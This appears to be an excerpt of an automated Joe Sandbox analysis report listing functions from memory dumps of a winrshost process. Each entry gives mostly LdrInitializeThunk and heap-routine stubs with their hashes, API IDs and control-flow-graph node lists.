                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3c53702c4bdb88a1d242709bc562ebe1f75eef8aba66e87b8b47435c2d4e8c4e
                                                                  • Instruction ID: b5cd35254ce9f873b28659563e4550824763992f33d0e0e378665fd3276f561a
                                                                  • Opcode Fuzzy Hash: 3c53702c4bdb88a1d242709bc562ebe1f75eef8aba66e87b8b47435c2d4e8c4e
                                                                  • Instruction Fuzzy Hash: E890023120101C03D580B158560474A040587D5301F92C419E4016654DCB298A6977B1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 22 3112b00-3112b0c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3fc83fbf44e4bf68fc993ae8dac58cb6ee5d25d3451cb12be35b9de6f3a5c775
                                                                  • Instruction ID: 46861d9781a0f193a7febd5276305e7b4567d0c6962812d88df1a2cd80c5cb66
                                                                  • Opcode Fuzzy Hash: 3fc83fbf44e4bf68fc993ae8dac58cb6ee5d25d3451cb12be35b9de6f3a5c775
                                                                  • Instruction Fuzzy Hash: 7890023120505C43D540B1585604B46041587D4305F52C415E4055694DD7398D65B671
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 25 3112b90-3112b9c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 5d5605b0030c8bb44d8992ce02348454d0450117dbf869db8463d31b8856fd93
                                                                  • Instruction ID: 9bceb7ba26f8b046f8b3f09fabab9c90cb72bb3393deafb1a8ba724e6b76fa28
                                                                  • Opcode Fuzzy Hash: 5d5605b0030c8bb44d8992ce02348454d0450117dbf869db8463d31b8856fd93
                                                                  • Instruction Fuzzy Hash: 8190023120109C03D510A158960474A040587D4301F56C815E8415658DC7A988A17131
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 24 3112b80-3112b8c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 6e7eeef1271d7d2edf366cc54b92876662fae5a216f5df3f8ec0da4d5ad9911e
                                                                  • Instruction ID: ffa74bc5772ceec3658f9202679ea9ee90e01b281175933b1e169870b6b41a50
                                                                  • Opcode Fuzzy Hash: 6e7eeef1271d7d2edf366cc54b92876662fae5a216f5df3f8ec0da4d5ad9911e
                                                                  • Instruction Fuzzy Hash: EF90023120101C43D500A1585604B46040587E4301F52C41AE4115654DC729C8617531
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 26 3112bc0-3112bcc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e67bac5a8e8639abda1a6504a9f6f1c4fa4787eaa5264e96b2f2f3d408093d1f
                                                                  • Instruction ID: 00b335c5fdfb34938d1d1ebca5fcfb35928a8459d78d5ce45a9c23bfddb0a0e3
                                                                  • Opcode Fuzzy Hash: e67bac5a8e8639abda1a6504a9f6f1c4fa4787eaa5264e96b2f2f3d408093d1f
                                                                  • Instruction Fuzzy Hash: 7D90023120101803D500A5986608746040587E4301F52D415E9015555EC77988A17131
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 21 3112a80-3112a8c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 63dfeb03b8f7841314b2d0294e1a8f8f236fff37e69eec0e62bd39cfa22a03ea
                                                                  • Instruction ID: 92c55d1a30ffdb923630b7ff9684398146927a1ef2c7d06895b09b82e828e3d1
                                                                  • Opcode Fuzzy Hash: 63dfeb03b8f7841314b2d0294e1a8f8f236fff37e69eec0e62bd39cfa22a03ea
                                                                  • Instruction Fuzzy Hash: 73900261202014034505B1585614716440A87E4201B52C425E5005590DC73988A17135
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 031129F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 20 31129f0-31129fc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: f5a93b08a473a9cd26711f2c14e08a68e2793db616da07fed62012de77d1db95
                                                                  • Instruction ID: a57ab773917b801c55260f3b2a4310f4945f3e7ea067ba94424013b6f031402a
                                                                  • Opcode Fuzzy Hash: f5a93b08a473a9cd26711f2c14e08a68e2793db616da07fed62012de77d1db95
                                                                  • Instruction Fuzzy Hash: 90900435311014030505F55C17047070447C7DD351353C435F5007550CD735CC717131
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 31 3112f00-3112f0c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b1e4e9680d5d4dfa0813f713e7707952d25f0bbcccb53e5e15261d26e1de75be
                                                                  • Instruction ID: 310d297a50ea9de57b5cf2e7ad80c9837e2444e1bee6b003ee7270d86a16705f
                                                                  • Opcode Fuzzy Hash: b1e4e9680d5d4dfa0813f713e7707952d25f0bbcccb53e5e15261d26e1de75be
                                                                  • Instruction Fuzzy Hash: 2390022121181443D600A5685E14B07040587D4303F52C519E4145554CCB2988716531
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 30 3112e50-3112e5c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 10eb0de816254023408e7b66553355bebc249b1f33e6107e809f5c8acb3f11c3
                                                                  • Instruction ID: 6f134f83a32fb009366853c713b39cba53ce342bafda11f102ff8a4cf9ed325d
                                                                  • Opcode Fuzzy Hash: 10eb0de816254023408e7b66553355bebc249b1f33e6107e809f5c8acb3f11c3
                                                                  • Instruction Fuzzy Hash: 6590026134101843D500A1585614B060405C7E5301F52C419E5055554DC72DCC627136
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 29 3112d10-3112d1c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 939d7d48943e017a6d56ab7e9132dd9eef5ca94170931a9ff2bf257814ffd2f8
                                                                  • Instruction ID: a5971b66aa3a8015931fe3b443ca196883fc34df619e4c027683426921e8a08c
                                                                  • Opcode Fuzzy Hash: 939d7d48943e017a6d56ab7e9132dd9eef5ca94170931a9ff2bf257814ffd2f8
                                                                  • Instruction Fuzzy Hash: A390023120101813D511A1585704707040987D4241F92C816E4415558DD76A8962B131
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 27 3112c30-3112c3c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e7a93b9f602278d80692ec07b4e9701b66f32415f15b6047431f87eb41873db3
                                                                  • Instruction ID: 8ae0e05cdf380956b7f775d6497573c26b15caa941813dfc0ff4cf3f71fe269e
                                                                  • Opcode Fuzzy Hash: e7a93b9f602278d80692ec07b4e9701b66f32415f15b6047431f87eb41873db3
                                                                  • Instruction Fuzzy Hash: 9D90022921301403D580B158660870A040587D5202F92D819E4006558CCB2988796331
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 28 3112cf0-3112cfc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b828eba3842ed638305480cef1df9226dfec843d7bb23c6da262c1c3eaec0673
                                                                  • Instruction ID: 8fc788913af63a116f76a8a97db6f140453c4d316f47b06a1a06fb43cef04d24
                                                                  • Opcode Fuzzy Hash: b828eba3842ed638305480cef1df9226dfec843d7bb23c6da262c1c3eaec0673
                                                                  • Instruction Fuzzy Hash: 81900221242055535945F1585604607440697E4241792C416E5405950CC73A9866E631
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02A68BD7 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 2a68bd7-2a68bd8 1 2a68bda-2a68be5 RtlFreeHeap 0->1 2 2a68bf8-2a68bfc 0->2 3 2a68be7 1->3 4 2a68bfe-2a68c05 1->4 5 2a68c4a-2a68c62 3->5 6 2a68be9-2a68bef 3->6 10 2a68c63-2a68c64 4->10 11 2a68c07-2a68c09 4->11 5->10 7 2a68ba3 6->7 8 2a68bf1-2a68bf6 6->8 12 2a68ba4-2a68ba9 7->12 8->2 13 2a68bac-2a68bb3 12->13 13->13 14 2a68bb5-2a68bcf 13->14 14->12 15 2a68bd1-2a68bd6 14->15 15->0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30432885507.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_2a40000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 6253273e8aabed6cde5a5db1267701369bd8f1f78971d49513043316514c0974
                                                                  • Instruction ID: d4b2054a1e3130e3da0b0fa703561c59798085d652fe3f6ba974e5faf7fd36f1
                                                                  • Opcode Fuzzy Hash: 6253273e8aabed6cde5a5db1267701369bd8f1f78971d49513043316514c0974
                                                                  • Instruction Fuzzy Hash: 8B11E35550DBC3DFE322A73C445D5F97B95EDA73287A040EDC1404F61BDF2A844A8789
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03112B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 16 3112b2a-3112b2f 17 3112b31-3112b38 16->17 18 3112b3f-3112b46 LdrInitializeThunk 16->18
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b51ef783bc939ae51a3aa07e4e75cadba016abd76a08d3de1a4d7750e8ac568d
                                                                  • Instruction ID: e3574709548f2a6bb689614f8463271ba91884ca21cffe4eaafad98e8609a688
                                                                  • Opcode Fuzzy Hash: b51ef783bc939ae51a3aa07e4e75cadba016abd76a08d3de1a4d7750e8ac568d
                                                                  • Instruction Fuzzy Hash: 17B09B719054D5C7DA11D76057087177D0467D4701F16C465D5460641E873CC0A1F175
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 03107550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03144592
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0314454D
                                                                  • ExecuteOptions, xrefs: 031444AB
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03144530
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03144460
                                                                  • Execute=1, xrefs: 0314451E
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03144507
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 4ffac45eec2ecb5e4181a75803e416fe765975c289e5429b1d9f4d688e00ecdc
                                                                  • Instruction ID: c0562de5742161b4a520ab6d462d899bb79ec078261ca04ca4178db3aa56a42c
                                                                  • Opcode Fuzzy Hash: 4ffac45eec2ecb5e4181a75803e416fe765975c289e5429b1d9f4d688e00ecdc
                                                                  • Instruction Fuzzy Hash: AD51E935A00319BBEF14EF95DC95FED77A8AF0C700F0805A9E505AB1C1DBB0AA45CA64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 030D9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  • Opcode ID: d48077d9f39f599f80b924b77d5dcd94835b0023b5ba8f1e54d5f696c090bf75
                                                                  • Instruction ID: a618495a038556162a6f969b1f7930896fc30809f665fbabe74cc50318743e13
                                                                  • Opcode Fuzzy Hash: d48077d9f39f599f80b924b77d5dcd94835b0023b5ba8f1e54d5f696c090bf75
                                                                  • Instruction Fuzzy Hash: E5814875D012699FDB35DF54CC44BEEBAB8AF49710F0485EAAA09B7240D7309E81CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%